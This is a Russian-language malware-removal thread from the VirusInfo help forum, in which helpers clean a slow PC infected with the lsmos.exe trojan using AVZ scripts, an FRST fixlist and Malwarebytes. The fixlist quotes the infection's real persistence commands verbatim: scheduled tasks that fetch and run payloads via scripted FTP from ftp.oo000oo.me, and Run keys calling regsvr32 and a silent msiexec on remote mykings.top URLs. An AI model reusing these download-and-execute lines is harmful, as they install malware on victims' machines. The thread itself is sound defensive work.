Доброго времени суток.
Прошу помощи в решении проблемы.
Комп тормозит так, что банальное перемещение ярлыка на раб. столе становится проблемой. Не могу понять из-за чего.
Заранее благодарен.
Printable View
Доброго времени суток.
Прошу помощи в решении проблемы.
Комп тормозит так, что банальное перемещение ярлыка на раб. столе становится проблемой. Не могу понять из-за чего.
Заранее благодарен.
Уважаемый(ая) [B]Conf[/B], спасибо за обращение на наш форум!
Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
Заметил, что систему грузит процесс lsmos.exe
Выполните скрипт в AVZ
[code]begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
QuarantineFile('C:\ProgramData\Microsoft\Adobe\Flash Player\C8479629-F7C2-4189-9E7B-086EC36D51B7\057B8D3F-7805-4741-ABBF-AAED28FD8228.exe','');
QuarantineFile('C:\Users\Гоша\AppData\Local\Microsoft\Extensions\extsetup.exe','');
QuarantineFile('C:\ProgramData\KRB Updater Utility\krbupdater.exe','');
QuarantineFile('c:\windows\debug\item.dat','');
TerminateProcessByName('c:\windows\syswow64\lsmos.exe');
QuarantineFile('c:\windows\syswow64\lsmos.exe','');
DeleteFile('c:\windows\syswow64\lsmos.exe','32');
DeleteFile('c:\windows\debug\item.dat','32');
DeleteFile('C:\ProgramData\KRB Updater Utility\krbupdater.exe','32');
DeleteFile('C:\Users\Гоша\AppData\Local\Microsoft\Extensions\extsetup.exe','32');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run','SafeBrowser');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run','KRB Updater Utility');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run','C8479629-F7C2-4189-9E7B-086EC36D51B7');
DeleteFile('C:\ProgramData\Microsoft\Adobe\Flash Player\C8479629-F7C2-4189-9E7B-086EC36D51B7\057B8D3F-7805-4741-ABBF-AAED28FD8228.exe','32');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start1');
DeleteFile('C:\Windows\system32\Tasks\Microsoft\extsetup','64');
DeleteFile('C:\Windows\system32\Tasks\Microsoft\KRBUUS\KRB Updater Utility Service','64');
DeleteFile('C:\Windows\system32\Tasks\Microsoft\KRBUUS\KRBLNKRUN','64');
DeleteFile('C:\Windows\system32\Tasks\Microsoft\SafeBrowser','64');
DeleteFile('C:\Windows\system32\Tasks\Microsoft\Windows\extsetup','64');
DeleteFile('C:\Windows\system32\Tasks\Microsoft\Windows\SafeBrowser','64');
DeleteFile('C:\Windows\system32\Tasks\Mysa','64');
DeleteFile('C:\Windows\system32\Tasks\Mysa1','64');
DeleteFile('C:\Windows\system32\Tasks\Mysa2','64');
DeleteFile('C:\Windows\system32\Tasks\Mysa3','64');
DeleteFile('C:\Windows\system32\Tasks\ok','64');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.[/code]Будет выполнена перезагрузка компьютера.
Выполните скрипт в AVZ
[code]begin
CreateQurantineArchive('c:\quarantine.zip');
end.[/code][b]c:\quarantine.zip[/b] пришлите по красной ссылке [color="Red"][u][b]Прислать запрошенный карантин[/b][/u][/color] [b]над первым сообщением[/b] темы.
[B][color="Red"] Пожалуйста, ЕЩЕ РАЗ запустите Autologger, прикрепите к сообщению НОВЫЕ логи[/color][/B]
Все сделал.
Скачайте [url=http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/][b]Farbar Recovery Scan Tool[/b][/url] [img]http://i.imgur.com/NAAC5Ba.png[/img] и сохраните на Рабочем столе.
[list][*][b]Примечание[/b]: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.[/list]
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите [b]Yes[/b] для соглашения с предупреждением.
2. Убедитесь, что в окне [b]Optional Scan[/b] отмечены [i]List BCD[/i], [i]Driver MD5[/i] и [i]90 Days Files[/i].
[img]http://i.imgur.com/3munStB.png[/img]
3. Нажмите кнопку [b]Scan[/b].
4. После окончания сканирования будет создан отчет ([b]FRST.txt[/b]) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет ([b]Addition.txt[/b]).
6. Отчеты, полученные в пп. 4 и 5, заархивируйте (в [b]один архив[/b]) и прикрепите к сообщению.
Сделал
1. Откройте [b]Блокнот[/b] и скопируйте в него приведенный ниже текст
[code]
CreateRestorePoint:
ContextMenuHandlers6: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> No File
Task: {02EA8E56-B422-458B-994E-CA01DA284779} - \Microsoft\Windows\SafeBrowser -> No File <==== ATTENTION
Task: {04A9561F-0779-4F89-BB5F-AD12AD9B3161} - \Microsoft\KRBUUS\KRBLNKRUN -> No File <==== ATTENTION
Task: {2FC11732-94E6-4E0D-9DDB-79BB892706C1} - \Mysa -> No File <==== ATTENTION
Task: {4FC894BA-DC57-4A08-90C9-83F26AA9C250} - \Microsoft\SafeBrowser -> No File <==== ATTENTION
Task: {52589800-174C-4B34-83C0-0283103CC4CD} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {6C8D3DC1-0C91-4A54-BEFB-8271F08DCF1A} - System32\Tasks\Mysa3 => cmd /c echo open ftp.oo000oo.me>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {900903D2-9550-4703-9CAE-E9733C0AB90D} - System32\Tasks\Mysa2 => cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {94025957-DDFA-4F11-88D5-BE57365E565B} - \Microsoft\extsetup -> No File <==== ATTENTION
Task: {AE89E767-1184-4447-80CA-0D689DC0D305} - System32\Tasks\Microsoft\Windows\AC8479629-F7C2-4189-9E7B-086EC36D51B7 => C:\ProgramData\Microsoft\Adobe\Flash Player\C8479629-F7C2-4189-9E7B-086EC36D51B7\057B8D3F-7805-4741-ABBF-AAED28FD8228.exe <==== ATTENTION
Task: {C44A9737-8957-4093-85FB-72391F3EDEBF} - \Microsoft\KRBUUS\KRB Updater Utility Service -> No File <==== ATTENTION
Task: {E1A9531E-1D7F-4C70-B579-F0E5C58683E3} - \Microsoft\Windows\extsetup -> No File <==== ATTENTION
Task: {FE1CEC12-39A1-47DC-AEB1-EC515936FE42} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
AlternateDataStreams: C:\ProgramData\TEMP:472FBBAF [143]
AlternateDataStreams: C:\Users\Все пользователи\TEMP:472FBBAF [143]
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{44db977c-d7ae-4f2f-9c64-975de3d7828f} <==== ATTENTION (Restriction - IP)
BHO: No Name -> {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} -> No File
BHO-x32: No Name -> {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} -> No File
Toolbar: HKU\S-1-5-21-3005586005-161804468-337732997-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
Toolbar: HKU\S-1-5-21-3005586005-161804468-337732997-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
Toolbar: HKU\S-1-5-21-3005586005-161804468-337732997-1000 -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} - No File
CHR Extension: (News Tab) - C:\Users\Гоша\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjacjjdnoddnpbbcjilcajfhhbdhkpgk [2016-05-02]
2017-08-08 20:29 - 2017-08-09 06:17 - 000003502 _____ C:\Windows\System32\Tasks\Mysa3
2017-08-08 20:29 - 2017-08-09 06:17 - 000003422 _____ C:\Windows\System32\Tasks\Mysa2
2017-08-08 20:29 - 2017-08-09 06:17 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2017-08-08 20:29 - 2017-08-09 06:17 - 000003186 _____ C:\Windows\System32\Tasks\ok
2017-08-08 20:29 - 2017-08-08 20:29 - 004165576 _____ C:\Windows\SysWOW64\lsmos.exe
Reboot:
[/code]
2. Нажмите [b]Файл[/b] – [b]Сохранить как[/b]
3. Выберите папку, откуда была запущена утилита [b]Farbar Recovery Scan Tool[/b]
4. Укажите [b]Тип файла[/b] – [b]Все файлы (*.*)[/b]
5. Введите имя файла [b]fixlist.txt[/b] и нажмите кнопку [b]Сохранить[/b]
6. Запустите FRST, нажмите один раз на кнопку [b]Fix[/b] и подождите. Программа создаст лог-файл ([b]Fixlog.txt[/b]). Пожалуйста, прикрепите его в следующем сообщении.
[list][*]Обратите внимание, что будет выполнена [b]перезагрузка компьютера[/b].[/list]
Готово
Что с проблемой?
Проблема осталась. Тормозить начинает неожиданно, непонятно из-за чего. Помогает перезагрузка но временно. Может начать сразу после включения, может только через 3-4часа работы пк.
Сделайте лог [url="http://virusinfo.info/showthread.php?t=53070&p=1104657&viewfull=1#post1104657"]полного сканирования МВАМ[/url]
Готово
Удалите в МВАМ все, [B]кроме[/B]
[CODE]PUP.Optional.AliExpress, C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\ALIEXPRESS.LNK, No Action By User, [74], [312356],1.0.2570
Heuristics.Shuriken, C:\TEMP\AUTOCAD2002\SETUP.EXE, No Action By User, [1708], [167],0.0.0
Heuristics.Shuriken, G:\TEMP\AUTOCAD2002\SETUP.EXE, No Action By User, [1708], [167],0.0.0
Generic.Malware/Suspicious, G:\USERS\Гоша\APPDATA\ROAMING\03DE0294-1432174125-05CE-8D06-980700080009\UNINSTALL.EXE, No Action By User, [0], [392686],1.0.2570
Adware.LoadMoney, G:\USERS\Гоша\DOWNLOADS\IMPERIA_TFILE_ME_TORRENT.ZIP, No Action By User, [45], [330742],1.0.2570
PUP.Optional.MediaGet, G:\USERS\Гоша\DOWNLOADS\TS3-TRANSLATIONS-RU_ID783774IDS5S.EXE, No Action By User, [2310], [10419],1.0.2570
RiskWare.GameHack, D:\GAMES\NASCAR '14\BIN\STEAM_API.DLL, No Action By User, [443], [305544],1.0.2570
RiskWare.GameHack, D:\GAMES\R.G. CATALYST\TOTAL WAR. ATTILA\STEAM_API.DLL, No Action By User, [443], [305544],1.0.2570
RiskWare.GameHack, D:\GAMES\TOTAL WAR - ROME II\STEAM_API.DLL, No Action By User, [443], [305544],1.0.2570
RiskWare.GameHack, D:\GAMES\GRAND THEFT AUTO V\STEAM_API64.DLL, No Action By User, [443], [305544],1.0.2570
Generic.Malware/Suspicious, D:\GAMES\ISO\NFS MW\KEYGEN\NEED_FOR_SPEED_MOST_WANTED_KEYGEN.EXE, No Action By User, [0], [392686],1.0.2570
PUP.Optional.Amonetize, D:\Музыка\5\AMAZING MELODIC DUBSTEP MIX DECEMBER 2013 FREE DOWNLOAD HD.MP3__4150_IL7684042.EXE, No Action By User, [6], [3737],1.0.2570
HackTool.WpaKill, D:\Программы\REMOVEWAT.EXE, No Action By User, [3606], [75683],1.0.2570
Trojan.Agent.CK, D:\Программы\Интернет\Почта\THEBAT_3.99_CRACK.RAR, No Action By User, [1985], [135524],1.0.2570
Trojan.Agent.CK, D:\Программы\Интернет\Почта\THE BAT\THEBAT3CRACK.ZIP, No Action By User, [1985], [135524],1.0.2570
Adware.Clicker, D:\Программы\Другие программы\UNLOCKER1.8.7.RAR, No Action By User, [205], [138406],1.0.2570
PUP.Optional.ASK, D:\Программы\Проигрыватели\KMP.EXE, No Action By User, [510], [383618],1.0.2570
PUP.Optional.AuslogicsBoostSpeed, D:\Программы\Другие программы\AUSLOGICS BOOSTSPEED 4.2.7.EXE, No Action By User, [1648], [357741],1.0.2570
Generic.Malware/Suspicious, D:\Программы\Интернет\IPTVPLAYER-SETUP.EXE, No Action By User, [0], [392686],1.0.2570[/CODE]
Сделал
В последнее время с проблемой не встречался.
Удалите МВАМ
Статистика проведенного лечения:
[LIST][*]Получено карантинов: [B]1[/B][*]Обработано файлов: [B]2[/B][*]В ходе лечения обнаружены вредоносные программы:
[LIST=1][*] c:\windows\debug\item.dat - [B]UDS:DangerousObject.Multi.Generic[/B][*] c:\windows\syswow64\lsmos.exe - [B]Trojan.Win32.Ukpa.a[/B][/LIST][/LIST]